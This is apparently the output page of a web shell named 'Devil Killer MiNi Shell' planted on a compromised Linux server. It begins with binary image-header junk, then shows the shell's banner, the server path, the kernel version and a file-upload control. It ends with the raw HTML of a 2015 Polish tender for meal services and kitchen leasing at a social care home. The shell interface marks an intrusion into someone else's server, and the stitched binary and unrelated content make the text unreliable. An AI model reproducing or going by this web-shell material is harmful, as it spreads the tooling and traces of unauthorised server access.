JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151221/348494-N-2015.html

<p class="kh_header"><b>Kamień Wielki: Świadczenie usług w zakresie przygotowywania i wydawania codziennych posiłków dla 103 mieszkańców Domu Pomocy Społecznej w Kamieniu Wielkim z jednoczesną dzierżawą pomieszczeń kuchennych wraz z wyposażeniem w budynku głównym DPS o łącznej powierzchni 428,11 m2</b><br>
<b>Numer ogłoszenia: 348494 - 2015; data zamieszczenia: 21.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Stawna 40, 66-460 Kamień Wielki, woj. lubuskie, tel. 095 7515828, faks 095 7515828.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wrota.lubuskie.pl/dpskamien/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przygotowywania i wydawania codziennych posiłków dla 103 mieszkańców Domu Pomocy Społecznej w Kamieniu Wielkim z jednoczesną dzierżawą pomieszczeń kuchennych wraz z wyposażeniem w budynku głównym DPS o łącznej powierzchni 428,11 m2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie żywienia:
1) średnia miesięczna ilość przygotowywanych posiłków wynosi:
3 posiłki dziennie x ilość dni w miesiącu x 103 mieszkanki + 3 dodatkowe posiłki dla diety cukrzycowej (II śniadanie, podwieczorek, II kolacja)
2) posiłki dla mieszkanek winny być dostarczane o ściśle określonych porach dnia:
śniadanie - godz. 7:30 - 9:30
obiad - godz. 12:30 - 14:30
kolacja - godz. 17:30 - 19:30
Zgodnie z przepisem § 6 ust. 1 pkt. 6 lit. c rozporządzenia w sprawie domów pomocy społecznej, czas wydawania dla każdego z posiłków wynosi 2 godziny.
3) przygotowywanie posiłków odbywać się będzie z uwzględnieniem diet stosowanych w tutejszym DPS zgodnie z zaleceniem lekarza oraz kaloryczności;
Żywienie mieszkańców opiera się na n/w dietach: dieta normalna - 30 osoby, dieta cukrzycowa - 13 osób, dieta bezmleczna - 6 osoby, dieta miksowana ogólna - 6 osób,
dieta lekkostrawna - 48 osóbb.
4) dla mieszkańców DPS ustala się dzienną normę kaloryczności 2.800 kcal, z dopuszczalnym dziennym odchyleniem (+ -) 5%;
5) w przypadku diety cukrzycowej wartość energetyczna wynosi 2.650 kcal z dopuszczalnym dziennym odchyleniem (+ -) 5%;
6) posiłki muszą odpowiadać wymogom sztuki kulinarnej z zachowaniem norm żywieniowych z uwzględnieniem niezbędnych składników pokarmowych (wartości odżywczych);
7) posiłki muszą pokrywać całodobowe zapotrzebowanie na kalorie i podstawowe składniki odżywcze tj. białka z przewagą pochodzenia zwierzęcego, tłuszcze, witaminy oraz sole mineralne;
8) przygotowywanie posiłków musi odbywać się na bieżąco, ze świeżych produktów zgodnie z wymaganiami określonymi odpowiednio w przepisach ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz. U. z  2010 r. Nr 136 poz. 914 ze zm.) i innych obowiązujących  w tym zakresie jak również z zaleceniami Instytutu Żywności i Żywienia;
9) posiłki muszą być gotowe do spożycia, nie wymagające dodatkowych obróbek;
10) przez dodatek żywieniowy Zamawiający rozumie podstawowe produkty żywnościowe i napoje dla diety normalnej a w przypadku innych diet zgodnie ze wskazaniami lekarza (§ 6 ust.6 pkt. d Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 23 sierpnia 2012 roku w sprawie domów pomocy społecznej Dz.U. 2012, poz. 964);
11) zamawiający nie dopuszcza możliwości podawania posiłków w naczyniach jednorazowego użytku oraz sztućców jednorazowego użytku, za wyjątkiem podawania deserów typu: pudding, galaretka, mus, sorbet itp. Przy czym naczynia jednorazowego użytku muszą posiadać stosowne atesty dopuszczające je do kontaktu z żywnością;
12) wykonawca przedstawi dwa przykładowe jadłospisy dla diety normalnej i cukrzycowej z różnych pór roku (lato, jesień) oraz jeden przykładowy jadłospis posiłków w okresie świątecznym z uwzględnieniem tradycyjnych polskich potraw świątecznych, w których  zawarte będą z podziałem na diety następujące dane: nazwa posiłku, gramatura, kaloryczność, podstawowe wartości odżywcze, gramatura gotowego posiłku z podziałem na części składowe;
13) Wykonawca jest zobowiązany do odbierania, zgodnie z obowiązującymi przepisami pozostałości jedzenia,  brudnych naczyń i sztućców;
14) Wykonawca jest zobowiązany do przedstawienia, w celu  zatwierdzenia Dyrektorowi  DPS z pięciodniowym wyprzedzeniem, planowanego na następną dekadę (10 dni) jadłospisu (wzór ustalony przez Wykonawcę), w którym  zawarte będą z  podziałem na diety następujące dane: nazwa posiłku, gramatura, kaloryczność, podstawowe wartości odżywcze, gramatura gotowego posiłku z podziałem na części składowe;
Zamawiający nie podaje receptur potraw, ale dopuszcza możliwość konsultacji w tym zakresie z upoważnionym pracownikiem Wykonawcy w trakcie trwania umowy.
15) Wykonawca zobowiązany jest do sporządzania jadłospisów zgodnie z zasadami żywienia i dietetyki stosowanej, opracowanymi przez Instytut Żywności i Żywienia;
16) Wykonawca przygotowując posiłki w okresie świąt oraz okazjonalnych uroczystości zobowiązany jest uwzględnić tradycyjne polskie potrawy;
17) Wykonawca winien  uwzględnić w jadłospisach potrawy sezonowe oraz owoce i  warzywa;
18) Minimalna temperatura podanych posiłków gorących winna wynosić dla:
1) zupy: 75oC,
2) drugiego dania: 65oC,
3) płynów: 80oC.
Maksymalna temperatura produktów zimnych (sałatki, pasty, sery, itp.): 15oC.
19) Zamawiający wymaga podawania do obiadu:
- co najmniej 3 x w tygodniu szt. mięsa mielonego, nie mielonego o gramaturze nie niższej niż 150 g czystego mięsa po obróbce, 
- 1 x ryba w postaci fileta w jednym kawałku - gramatura czystej ryby (bez panierki po obróbce termicznej - 100 g lub śledzia w śmietanie - gramatura czystego śledzia min. 150 g, 
- 3 x obiad jarski (naleśniki, pierogi, kopytka, itp.) - min. 300 g;
20) Zamawiający wymaga aby do obiadu podawane były ziemniaki, kasze, ryż, makarony i inne. Podanie tego samego dodatku nie może być częściej niż co 3 dni.
21) Codzienne obiady składać się muszą z dwóch dań, tj. zupy i dania głównego oraz kompotu lub soku.
22) Zamawiający wymaga podawania co najmniej 1 x w tygodniu porcji ciasta, bułki słodkiej lub zamiennie ciastek - 100 g;
23) surówki podawane do obiadu winny być dostosowane do pory roku i diety - 200 g, warzywa gotowane - 250 g; częstotliwość podania tej samej surówki i warzyw nie może przekraczać 5 dni;
24) Zamawiający dopuszcza podawanie gorących posiłków w porze kolacji;
25) Zamawiający wymaga podawania zup mlecznych w porze śniadania od poniedziałku do soboty, niedziela kakao lub kawa zbożowa;
26) w przypadku imprez okolicznościowych Wykonawca przygotowane posiłki będzie podawać w określonym przez Zamawiającego czasie i w określony przez Zamawiającego sposób;
27) Wykonawcy przysługiwać będzie dodatkowe wynagrodzenie w przypadku imprez okolicznościowych po wcześniejszym uzgodnieniu ilości wydanych posiłków i rodzaju posiłków za osoby ponad 103 mieszkanki;
28) o przesunięciu czasu wydania posiłku Zamawiający zobowiązany jest powiadomić Wykonawcę z dobowym wyprzedzeniem;
29) Wykonawca przygotowuje tzw. suchy prowiant dla mieszkańców Domu w dniach, w których wyjeżdżać oni będą na wyjazdy okolicznościowe. W ramach suchego prowiantu muszą znaleźć się również ciepłe napoje w termosach zabezpieczonych przez Wykonawcę. Rodzaj i ilość porcji uzgadniane będą z upoważnionym pracownikiem Zamawiającego. O planowanym wyjeździe Zamawiający poinformuje Wykonawcę z co najmniej dwudniowym wyprzedzeniem; 
30) Zamawiający wymaga zachowania dziennej gramatury poniższych produktów w granicach: pieczywo nie mniej niż 250 g, wędlina (różna) nie mniej niż 60 g, wędlina (różna) na gorąco nie mniej niż 100 g, sałatki, surówki (różne), dodatek warzywny do śniadania i obiadu nie mniej niż po 100 g lub warzywa gotowane 250 g, twarogi (różne) nie mniej niż 100 g, ser żółty nie mniej niż 100 g, produkty podawane w zestawie np.: ser-wędlina gramatura dostosowana, jajko nie mniej niż 2 sztuki klasy L, pasty (różne) nie mniej niż 100 g, zupy podawane do obiadu nie mniej niż 0,45 litra, mleko nie mniej niż 0,5 litra o zawartości tłuszczu 2%, masło śmietankowe nie mniej niż 20 g, masło roślinne nie mniej niż 20 g. 
31) Zamawiający wymaga podawania 100 g produktów typu jogurt, kefir, mus, galaretki, kisiele nie  rzadziej niż co 7 dni;
32) Wykonawca ma obowiązek zapewnienia mieszkańcom, zgodnie z rozporządzeniem w sprawie domów pomocy społecznej, przez całą dobę dostępu do podstawowych produktów żywnościowych i napojów, oraz możliwości wyboru zestawu posiłków lub otrzymania posiłku dodatkowego.
W związku z powyższym Wykonawca zobowiązany jest przygotować tygodniowo, z przeznaczeniem na rozstawienie w kuchence personelu do wykorzystania przez mieszkańców: herbata czarna 100 g - 9 opakowań; kawa inka - 300 g; cukier kryształ - 10 kg, chleb 0,6 kg - 7 sztuk, masło roślinne 0,5 kg - 1 szt.; zamiennie - dżem 280 g - 5 szt.;  - pasztet 0,5 kg - 2 szt;
Personel opiekuńczy Zamawiającego odbierał będzie sukcesywnie ww. artykuły, co potwierdzone będzie własnoręcznym podpisem przez wydającego i odbierającego.
Koszt wyżej wymienionych artykułów spożywczych wliczony będzie w cenę jednostkową usługi. Wymienione ilości mogą ulec zmianie w zależności od zapotrzebowania mieszkańców;
33) Wykonawca dostarczy posiłki na własny koszt; posiłki wydawane są na stołówce DPS (w sąsiedztwie pomieszczeń kuchni);
34) Wykonawca zobowiązuje się wywiesić jadłospis dekadowy na tablicy przy stołówce;
35) W przypadku zmiany ilości posiłków lub rodzaju diety na dzień następny pracownik socjalny tutejszego Domu Pomocy Społecznej zgłosi Wykonawcy zmianę zamówionych posiłków do godz. 13:00.   Nadzór nad jakością, ilością i przestrzeganiem obowiązujących norm odnośnie wydawanych posiłków sprawować będzie wyznaczony pracownik Zamawiającego;
36) Zakwestionowane przez pracownika Zamawiającego posiłki pod względem ilości i jakości podlegają natychmiastowej wymianie na pełnowartościowy posiłek na koszt Wykonawcy;
37) W razie wystąpienia przypadków diet niepełnych (m.in.: przyjęcie nowego mieszkańca lub powrót ze szpitala albo też powrót mieszkańca z urlopu w godzinach popołudniowych), przyjmuje się następujące wartości procentowe udziału poszczególnych posiłków w cenie jednostkowej usługi:
śniadanie - 30 % wartości ceny jednostkowej usługi,
obiad + posiłek dodatkowy - 45 % wartości ceny jednostkowej usługi,
kolacja - 25 % wartości ceny jednostkowej usługi;
38) Zamawiający nie wyraża zgody na zastosowanie w posiłkach produktów seropodobnych i czekoladopodobnych;
39) Zamawiający nie wyraża zgody na zastosowanie potraw oraz produktów w skład których wchodzi mięso oddzielone mechanicznie MOM (z uwagi na niską wartość odżywczą oraz dużą zawartość tłuszczu);
40) Zamawiający zastrzega, iż produkty mięsne winny być przygotowane z mięsa klasy I oraz Wykonawca zobowiązany jest do podawania wędlin klasy I (wysoka zawartość mięsa w wędlinie);
41) Wykonawca wymaga zachowania w piątki oraz w wielką środę, wielką sobotą i wigilię potraw postnych.
42) Zamawiający nie dopuszcza możliwości powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom;
43) Zamawiający zastrzega sobie prawo przekazania porcji posiłków do właściwej Stacji Sanitarno-Epidemiologicznej w celu przebadania ich zgodności kalorycznej i jakościowej z obowiązującymi w tym zakresie normami.
W zakresie dzierżawy pomieszczeń i udostępnionego sprzętu:
Warunkiem świadczenia usług gastronomicznych dla Domu jest wydzierżawienie pomieszczeń kuchennych wraz z elementami stałego wyposażenia, o łącznej powierzchni 428,11 m2.
Dopuszcza się możliwość rezygnacji z niektórych pomieszczeń.
1) Zamawiający wydzierżawi pomieszczenia kuchenne umożliwiające wykonywanie działalności cateringowej, zgodnie z przedmiotem zamówienia;
2) Zamawiający wyraża zgodę na wywóz posiłków w ramach cateringu dla odbiorców zewnętrznych;
3) Ostateczna ilość przedmiotów wyposażenia zostanie określona w protokole zdawczo-odbiorczym;
4) Należy zapewnić wymagany standard sanitarno-epidemiologiczny w zakresie wyznaczenia obszaru czystego i brudnego w udostępnionych pomieszczeniach;
5) Wykonawca zobowiązany jest do przekazywania Zamawiającemu kserokopii z przeprowadzonych kontroli przez właściwą Stację Sanitarno-Epidemiologiczną. Za uchybienia ujawnione w trakcie jakichkolwiek kontroli, np. Sanepidu, związane ze świadczoną przez Wykonawcę usługą, której następstwem będą m. in. mandaty, kary, odpowiada Wykonawca.
6) Wykonawca powinien zapewnić niezbędną ilość zastawy stołowej zgodnie z wymaganiami określonymi odpowiednio w przepisach ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz. U. z  2010 r. Nr 136 poz. 914 ze zm.) i innych obowiązujących  w tym zakresie jak również z zaleceniami Instytutu Żywności i Żywienia  dla zapewnienia płynnej dostawy i dystrybucji posiłków;
7) Wykonawca odpowiada za wynajmowane urządzenia i naczynia, dokonuje niezbędnych napraw i uzupełnia na bieżąco braki w wynajmowanych zasobach, jeśli wystąpią.
8) Wykonawca zapewnia we własnym zakresie pozostałe, oprócz wynajmowanych, urządzenia
i naczynia niezbędne do wykonania usługi. Sprzęty zakupione w celu doposażenia kuchni przez Wykonawcę po zakończeniu umowy pozostają jego własnością.
9) Wykonawca ma obowiązek właściwej eksploatacji i konserwacji wszystkich udostępnionych pomieszczeń oraz urządzeń, utrzymanie w porządku i czystości zgodnie z zasadami sanitarno-epidemiologicznymi. Sprzęt i środki do utrzymania czystości zapewnia Wykonawca.
10)  Wykonawca zobowiązany jest do ponoszenia kosztów oraz wykonywanie badań w zakresie Pomiarów Kontrolnych Instalacji Elektrycznej w wynajmowanych pomieszczeniach (raz w roku).
11)  Wykonawca ma obowiązek dbać o wydzierżawione urządzenia, meble i sprzęt;
12)  Zamawiający odda w użytkowanie dwa sprawne dźwigi towarowe. Wykonawca zobowiązany jest do pokrycia kosztów naprawy i konserwacji używanych dźwigów (w przypadku ich używania).
13)  Wykonawca ma obowiązek zapewnienia: dobrej organizacji pracy, sprawnego wydawania posiłków, wyposażenia pracowników dystrybucji w odzież ochronną zgodną z wymogami sanitarno-higienicznymi, utrzymać płynność wydawania posiłków, odpowiednią temperaturę i estetykę wydawanych posiłków;
14) Wykonawca ma obowiązek przeprowadzać dezynsekcję i deratyzację pomieszczeń według potrzeb i zgodnie z przyjętymi procedurami Dobrej Praktyki Higienicznej;
15)  Wykonawca zobowiązany jest umożliwić i współdziałać w przeprowadzanej przez pracowników Zamawiającego kontroli bez wcześniejszego uzgodnienia. Umożliwienie, nie rzadziej niż raz w miesiącu, kontroli stanu sanitarnego dzierżawionych pomieszczeń osobie wyznaczonej przez Zamawiającego;
16) Na Wykonawcy spoczywa obowiązek: przestrzegania wymogów Sanepidu i zasad HACCP oraz do przechowywania próbek żywności przez 72 godz., pobieranych zgodnie z procedurą; malowania pomieszczeń zgodnie z wymogami sanitarno-higienicznymi oraz zaleceniami Sanepidu. Zamawiający w każdej chwili może wnioskować o przeprowadzenie kontroli Sanepidu.
17) Czyszczenie kanalizacji, odtłuszczalników według potrzeb odbywać się będzie na koszt Wykonawcy.
18)  Zamawiający  zobowiązuje się do wyposażenia wynajętych pomieszczeń w podręczny sprzęt gaśniczy według obowiązujących przepisów przeciwpożarowych oraz objęcia ich stałą kontrolą p. poż. na koszt Wykonawcy.
19)  Wykonawca na podstawie noty obciążeniowej jest zobowiązany do ponoszenia kosztów zużytej wody i energii elektrycznej wg wskazań podliczników oraz za CO. Zamawiający podaje kwotę stałą za m2 CO w wysokości 4,13 zł. Najemca zobowiązuje się do ponoszenia częściowych kosztów centralnego ogrzewania przedmiotu najmu o powierzchni 295,21 m2 - w sezonie grzewczym od października do marca na podstawie noty obciążeniowej. 295,21 m2 x 4,13 zł = 1.219,22 zł miesięcznie za CO w okresie od października do marca. 
20)  Wykonawca ponosi wszelkie koszty związane z utrzymaniem czystości pomieszczeń
i sprzętu wykorzystywanego do realizacji zamówienia oraz ich okresowej konserwacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 70.22.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Cena za wynajem pomieszczeń wraz z wyposażeniem - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy - Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany zawartej Umowy w stosunku do treści oferty Wykonawcy, na podstawie określonych poniżej warunków:
- zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT;
- zmiana oznaczenia danych Zamawiającego i/lub Wykonawcy;
- zmiana Personelu Wykonawcy i/lub Zamawiającego;
- w wypadku wszystkich zmian obiektywnie ocenianych jako korzystne dla Zamawiającego;
- w wypadku zmian stanu prawnego lub faktycznego, które mają wpływ na treść zawartej umowy, jeżeli taka zmiana leży w interesie publicznym;
